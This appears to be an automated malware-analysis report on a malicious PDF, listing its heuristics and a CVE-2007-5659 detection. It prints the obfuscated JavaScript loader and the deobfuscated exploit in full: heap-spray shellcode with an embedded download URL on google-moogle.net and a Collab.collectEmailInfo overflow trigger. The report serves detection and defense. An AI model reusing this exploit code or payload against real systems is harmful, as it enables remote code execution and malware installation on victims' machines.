MALICIOUS
308
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file contains embedded JavaScript, indicated by PDF_JAVASCRIPT and PDF_JS heuristics. A high-severity PDF_EVAL heuristic firing suggests the use of eval(), a common technique for obfuscating malicious JavaScript. The extracted artifact 'javascript_obj0013_001.js' also shows signs of script obfuscation. The script's purpose is likely to download and execute a second-stage payload, although the exact details are obscured.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 8
-
Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
-
JavaScript action low 3 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
function ikOQaZLS3Mt(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function Y3vtI3YIDR3U(pEWpOGwe){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(pEWpOGwe)"+";"+"}");eval("function tvdBway62lG(HWzwkN){var R8FXvM3ZPrqM="+"0,fjVDtJxm=HWzwkN.l"+"en"+"gth,SohQjLcgvalx=10"+"2"+"4,UpSYp,SDXhw3vq,gdxfRf7A1iqwJ='',Heej8DYWWl4Di7=R8FXvM3ZPrqM,FS2BQhd6nn=R8FXvM3ZPrqM,He4oGwTvga=R8FXvM3ZPrqM,O7e1Asj=Ar"+"ra"+"y(63,16, … -
PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URLDecoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERYBounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://google-moogle.net/fiesta/load.php?id=30417&spl=4 Referenced by PDF JavaScript
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0013_001.js |
pdf-javascript-stream | PDF /JS object 13 at offset 0x369 | 6502 bytes |
SHA-256: abf89e9df60354361598bb2a08c4118ba16085b7b3ad2f10d019f9ef7643ece0 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 4 eval/decoder/string-building token(s). 171 of 242 identifiers look randomly generated (e.g. 'NyBZD9G5SCBZyy7czyBZFkhcNyBZ'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function ikOQaZLS3Mt(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function Y3vtI3YIDR3U(pEWpOGwe){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(pEWpOGwe)"+";"+"}");eval("function tvdBway62lG(HWzwkN){var R8FXvM3ZPrqM="+"0,fjVDtJxm=HWzwkN.l"+"en"+"gth,SohQjLcgvalx=10"+"2"+"4,UpSYp,SDXhw3vq,gdxfRf7A1iqwJ='',Heej8DYWWl4Di7=R8FXvM3ZPrqM,FS2BQhd6nn=R8FXvM3ZPrqM,He4oGwTvga=R8FXvM3ZPrqM,O7e1Asj=Ar"+"ra"+"y(63,16,57,34,8,22,5,37,48,29,0,0,0,0,0,0,15,17,51,45,28,1,46,2,38,47,32,52,55,39,40,13,33,30,62,24,43,49,14,11,21,12,26,0,0,0,0,58,0,19,59,9,7,56,0,50,53,6,54,60,10,36,31,25,42,61,4,18,27,3,20,23,35,44,41);f"+"o"+"r(SDXhw3vq=M"+"at"+"h.c"+"ei"+"l(fjVDtJxm/"+"SohQjLcgvalx)"+";SDXhw3vq>R8FXvM3ZPrqM;SDXhw3vq-"+"-){fo"+"r(UpSYp=Ma"+"th.m"+"in(fjVDtJxm,SohQjLcgvalx);UpSYp>R8FXvM3ZPrqM;UpSYp-"+"-,fjVDtJxm-"+"-){He4oGwTvga|"+"=(O7e1Asj[HWzwkN.cha"+"rCod"+"eAt(Heej8DYWWl4Di7+"+"+)-48])<"+"<FS2BQhd6nn;if(FS2BQhd6nn){gdxfRf7A1iqwJ+"+"=Y3vtI3YIDR3U"+"(30^He4oGwTvga&"+"2"+"5"+"5);He4oGwTvga>"+">="+"8;FS2BQhd6nn-"+"="+"2;}el"+"se{FS2BQhd6nn="+"6"+";}}"+"}return (gdxfRf7A1iqwJ);}var IIj4U=implode('',['RJjn','y2x9yA6Alq','hWk9L5cOdAy','eB','4RfL','Qz2BwyUjnMoBO7euQTEwnp9wD8','2aZi9MoZzKvb','z3Oy7','Koaqv','nX','9','XZpOwlp67YRShZko','w','Zo','9x','@7','2','aZj9MDb2xOy7K','oaq','vn','X9XZpOwlp66YgCdD2z','H9K8345Cin','j755Lvitc','9jv','@hwXw','7HZB73','ZA','2aOxeutc9jv@hwXw7HZ','B73ZA','XgSR85sMOha','q','XhXzzjDzN5vRY3@y7','K','oa','qvnX9XZpOw','lp6','6YCCin','Czit','L','EwQ','je3','Y','5Cin','j755U','8gO','7eutbz','jZyEM@y7K','oaqvnX9XZpO','wlp6','X','cRY','H@eCiD','qzj9UEM@O','A','iljhvaa7rvjDx@72uZ0UH@9ch9l9H@xe','xWH2snFKMWq2','sn7eu','Z0UH','@IP5Zdhgtzhioyz','m9','RY3@T','ELQChLnFCMOk','y','BZ','pK3lC','yBZpK3lCyBZpK3','lCyBZFJh5DCB','ZCK','glDCBZN','JswMyB','ZHeGwMyBZHe','3W','I','y','BZtPX','WCyBZt','U','3lCyBZ','tU6','5nCBZt','o3WTyBZSP','h5','9C','B','ZSP65','SCBZH8X','lSC','BZ','ZP7ltCBZ','tP','h5SCBZNNg','5SCB','Z','thgwSC','BZ','MJ6lpyBZp8G5C','yBZMJ','6lp','yBZNyh5z','yBZtP7WC','yB','ZtP','h','5DC','BZNNg5SCBZD93','WCyBZNk','3','cz','yBZtqgwIy','BZFm3','WC','y','BZtPhWIyBZ','tPh5','S','CBZnq6','lNyBZD9','g','5','DCBZz','m3czyBZ','NygWIyBZFmg','5I','y','BZtPh','WSC','BZtPh5','SCBZnq6lNyBZD','9g5zyBZ9q7c','zyB','ZIegl','SCBZFmGWZ','CB','ZtP7WZC','BZtPh5S','C','BZn','q6lNyBZD9g5CyBZFe3czyB','ZFJ','6WIyBZFm3cSCBZtPXWD','C','BZt','Ph5S','CBZnq6l','NyBZD9G5SCBZyy7czyBZFkhcNyBZ','Fm','glzyB','Zt','P','6WM','yBZtPh','5SCBZnq6lNyBZnP65DCBZZ7Gl','SCBZ','Mk','6W9CBZNJ','g','WTy','BZS7','gwnCBZto3','WNy','B','ZtPh5tCBZD','qg','5SCBZM','k6','l','NyB','ZNNswDCBZtUhw','nC','BZt','C7cTy','BZ','N','NGwNyB','ZS7Gwn','CBZ','F','m','GwMy','BZt','P6l','py','BZtPh','5SCB','ZHmG','wS','CBZSC','35My','BZM','JXw','Fy','BZz','S3WzyBZtPh5SCBZ','NJ','g','5SCB','ZShgwnCBZyk','6l','pyBZyJ6l','9CBZNJGwSCBZ','9Phw','n','CBZI','e','3czyBZtPh5SCBZDPh5','SCBZ','nq6l','pyBZHy','G5D','CBZDPg5ZCBZDq6','l','p','yBZ','F','mG5z','yBZtP','7ctCB','ZtPh5SCBZnqh59C','BZy','S','swSCBZDhg5SCBZ9qgcIyBZ','yS3cnCBZtUhwSCBZH','khcz','yBZtP','h5S','CBZMkhWF','yBZ','NNswS','C','BZthgwnC','BZtC7cTyBZN','NGwNy','BZS7GwnCBZ','nP7WzyBZ','tPh5','SCB','ZH','yg5S','CBZD','7g','5Hy','BZnq','h59CBZZ','hXwDCB','ZDhXWpyB','ZIeGw9C','B','Z9P','hc','n','CB','ZD','h','6wSCBZ','nq6l','p','y','BZ','HyG5C','yBZDPg5nC','BZDq6lpy','BZFmG5','zyBZ','tPXw','9CBZtPh','5SCBZtP7cTyBZMkhWFy','BZNN','s','wSC','B','Zt7gwn','CBZtz7cTyB','ZNNGwNyBZ','S7GwnCBZSP7WzyB','ZtPh5SCBZHyg5','SCBZNNgWF','yB','Z','SPhwnCB','ZtC7cT','yBZNNGwNyBZS7Gwn','CB','ZtP7WzyBZtPh5SCBZnCh5SCBZD','z6wpyBZFyh59','CBZFyh59CBZFyh59','CBZFyh5','9CBZFKGl9CBZDCg5','D','C','B','ZNNGw9CBZFN','XW','T','yBZD','zh','WHyBZ','FJhWFyBZN','NGwnCBZNN','3WCyBZ','t','7gcyy','BZDU','Glpy','BZD','9g5CyBZMK6lpyBZN','N','35CyBZSqg','cDCBZthhczy','BZD','9','g','W9C','B','Z','MDGlpy','BZth','XwSCBZZhhW9CBZnPG','WNyB','Zp8gwtCBZy','K','h59C','BZ','Zh6','wM','yBZt2gW','MyB','ZSP','hlI','yBZIN7','5','TyBZt7g','cDCBZyk','G','WtCBZ','thh','5yyBZnPh','W','ZCBZIy7','WpyBZIk35','pyBZ','Mk6','w','IyB','Z','DC3W','n','C','BZF','NGl','pyBZDCGl','pyBZt','hXwDC','B','ZHDs','WyyBZthG','lpyBZNNgwpyBZ','S','hG','wTyBZC8g59CBZt','U','6lpyBZth6lpyBZ','DqGWnCBZyN','6w','yyB','Z','tPh','5zyBZI87WzyBZIegW','IyBZ','DqhWFyBZnhGwZCBZn2gwyyBZt','PhwIyBZzNGlH','yBZzeslpyB','ZyJX','WnCBZNmGWSCBZNJ6lS','CBZNK','6lzyBZyN6','lTy','BZNJ6lZCBZ','NmGlSCBZNyGl9CBZNy','6WtC','BZzNGlT','yBZNJGWSCBZNyGlM','yB','ZzN','slCyB','ZyJ6lIyBZNJ6','l9C','BZNNGl','IyBZzeG','WtCBZz','eGlH','yBZN','DsWSCBZCN','6l','pyBZCe','sWCy','BZCksW','py','BZ','y','JsWzyBZzes','lC','yBZCN','6l','9CB','ZFesWp8BO','7euZ0U','H@9qK','5z','NKWRY3@FSHlFe3','WFes','cRJjny2Bo','dPs5','Wo55aUm@xe','BtN7jACk','5ZC','AitlodYgCd','D2z','H9R1x@yv3@NqdtR','Sh','ZkowZo2B4RK','hat73sI','eBYR','SB','odPs5Wo55aU','vO','FS','5W','HDacR','Jjny2utc9','jv@','hwX','w7HZB73ZA2B4RyiD','b','h5n02jQ','j8BVT93','WMegVT93WMeG@L','v3@y7','KoaqvnX9XZpOw','lp67@xeaZi9MoZzK','vbz3Oy7K','oaqvnX','9X','Z','pOwlp6','7YRShZkow','Zo9ac','RJj','ny','2xADEwaT','AM@x','exO9ch9l9H','@BexWH','z3WFe','3WFDaY9qK5','zNKW7euQUUH@j','Jjny2u','DF969N','qGw','AO79g9L4FvGDF96','9NqGwAO79g9M4iU6DOC','i','97fM','twA','dZI','8','XvaoMDLX','aO','L','e','aoRSdtvA','msnqGnL','CXsB','ArW6EMtwAdZI8X','vao','MDLO','m@x','eutc9jv@hw','Xw7HZB7','3Z','A2aORk','iZz9vWI75tmUH','sjX3@x2BSR','J','LZ8hMZL6d','DR8McUEMZjDx@72','uZ0','UH@1U3oB','9ga','BUht','s2','B4RkMt','FEuZL','CwZbUisbU5tL6dD8N5DOzit','LEwQ','jDa','c','Rf6WHOL','c@','OdwIc7@xe','u','vyS','jDMkKDDq','H','v88jQFcLnqCMOU4m','5UmMYk8BO7','euZ0UH@','OqH5','A','hhQRY3@','8CwZR','k','6tyqLojf6WHOLc@','Od','wIc6Yq','oLn','yq7Zj','e','gOg','f6WHOL','c@','OdwIc6YqoLny','q7ZjkgOgf6WHOL','c@','OdwIc6Y','qoL','nyq7','Zj8gOLv','3@LPM@jSaaI','zXv9CwAFYm@','xY3@HeuVee','xOjKK','tZ6XwbXKWu2','B4','x','eBWRJuVR','KKt','Z6Xw','bX','rWu2','x4R8gOR4H','SRKKtZ','6XwbXKWu2x','4RkgOLexS32xOO','qH5','Ah','hQ62g1RY','g4Rm3@eJx','@OqH5Ah','hQ6qg1','R','43@IDx@3cH@','jKKt','Z6','Xwb','XmWu2x4RmgOLeaoRKr','oNSw','aOO','Xs','1oBO7euZ','0UH@D2','HWUAM','Z','5','2H@xe','BZ8C','wt','qqM','tbou@byHWq2snby','HW','q2snk','Da','cRmH9Lc','LQj','87tFr','d9','po7t84LQ87M','Zj2x4RN3lMyGW','L','euwF2sDKzHXF2aOxeuwF','2','s','DKzHXF','X3@poL9CEanUcM','D0Uwa','p6dtb2B4RKXDgc','L','nkE','a','nUcMDbhMZ','t','OLnLc','LX8PwDjv5','tTUd9me','u@k4BDC7dcR','8','7tFrd9po','7tx9acRYH','@x2unHr','dDpoBO','7f']);");eval(tvdBway62lG(IIj4U));}
|
|||
generic_stage_recovery_000.js |
deobfuscated-js | generic stage recovery sixbit-xor-table from JavaScript object 13 at offset 0x369 | 2611 bytes |
SHA-256: 1bfad55ced9ebfa0a451ec6e40cf5b98dcf3acebfcb543569bbd42d5c2f57337 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 3 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var hrJZTA1biEWmZ2 = new Array(); function wXixDTMe4(rWyMQcKIwtm7tO, HubhwG) { while (rWyMQcKIwtm7tO.length*2<HubhwG){rWyMQcKIwtm7tO += rWyMQcKIwtm7tO;} rWyMQcKIwtm7tO = rWyMQcKIwtm7tO.substring(0,HubhwG/2); return rWyMQcKIwtm7tO; } function Sz6hSSMWN() { var CLiTy = 0x0c0c0c0c; var qvwY3qwszrTh = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u672F%u6F6F%u6C67%u2D65%u6F6D%u676F%u656C%u6E2E%u7465%u662F%u6569%u7473%u2F61%u6F6C%u6461%u702E%u7068%u693F%u3D64%u3033%u3134%u2637%u7073%u3D6C%u0034"); var CQE7T1 = 0x400000; var yY6GUxGMR = qvwY3qwszrTh.length * 2; var HubhwG = CQE7T1 - (yY6GUxGMR+0x38); var rWyMQcKIwtm7tO = unescape("%u9090%u9090"); rWyMQcKIwtm7tO = wXixDTMe4(rWyMQcKIwtm7tO, HubhwG); var XBnSuj = (CLiTy - 0x400000)/CQE7T1; for (var npIjv1BOMhli=0;npIjv1BOMhli<XBnSuj;npIjv1BOMhli++) { hrJZTA1biEWmZ2[npIjv1BOMhli] = rWyMQcKIwtm7tO + qvwY3qwszrTh; } } function b8ont() { var N2xm9QmBqL = app.viewerVersion.toString(); N2xm9QmBqL = N2xm9QmBqL.replace(/\D/g,""); var SqDOCe = new Array(N2xm9QmBqL.charAt(0),N2xm9QmBqL.charAt(1),N2xm9QmBqL.charAt(2)); if ((SqDOCe[0] == 8 && ((SqDOCe[1] == 1 && SqDOCe[2] < 2) || SqDOCe[1] < 1)) || (SqDOCe[0] == 7 && SqDOCe[1] < 1) || (SqDOCe[0] < 7)) { Sz6hSSMWN(); var Bp0ojtHp = unescape("%u0c0c%u0c0c"); while(Bp0ojtHp.length < 44952) Bp0ojtHp += Bp0ojtHp; this.collabStore = Collab.collectEmailInfo({subj: "",msg: Bp0ojtHp}); } } b8ont();
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.